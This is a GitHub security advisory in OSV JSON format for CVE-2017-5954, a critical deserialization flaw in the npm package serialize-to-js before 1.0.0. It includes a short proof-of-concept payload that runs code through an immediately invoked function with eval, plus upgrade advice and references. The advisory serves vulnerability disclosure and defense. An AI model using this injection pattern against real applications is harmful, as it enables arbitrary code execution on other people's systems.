{ "schema_version": "1.4.0", "id": "GHSA-mm62-wxc8-cf7m", "modified": "2023-09-13T19:43:49Z", "published": "2018-07-18T18:27:41Z", "aliases": [ "CVE-2017-5954" ], "summary": "Code Execution Through IIFE in serialize-to-js", "details": "Affected versions of `serialize-to-js` may be vulnerable to arbitrary code execution through an Immediately Invoked Function Expression (IIFE). \n\n## Proof of Concept\n```js\nvar payload = \"{e: (function(){ eval('console.log(`exploited`)') })() }\"\nvar serialize = require('serialize-to-js');\nserialize.deserialize(payload);\n```\n\n\n## Recommendation\n\nUpdate to version 1.0.0, or later, and review [this disclaimer](https://www.npmjs.com/package/serialize-to-js#deserialize) from the author.", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "affected": [ { "package": { "ecosystem": "npm", "name": "serialize-to-js" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ] } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5954" }, { "type": "WEB", "url": "https://github.com/commenthol/serialize-to-js/issues/1" }, { "type": "WEB", "url": "https://github.com/commenthol/serialize-to-js/commit/1cd433960e5b9db4c0b537afb28366198a319429" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mm62-wxc8-cf7m" }, { "type": "PACKAGE", "url": "https://github.com/commenthol/serialize-to-js" }, { "type": "WEB", "url": "https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/313" }, { "type": "WEB", "url": "https://www.npmjs.com/package/serialize-to-js#deserialize" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/96223" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "severity": "CRITICAL", "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:46:35Z", "nvd_published_at": null } }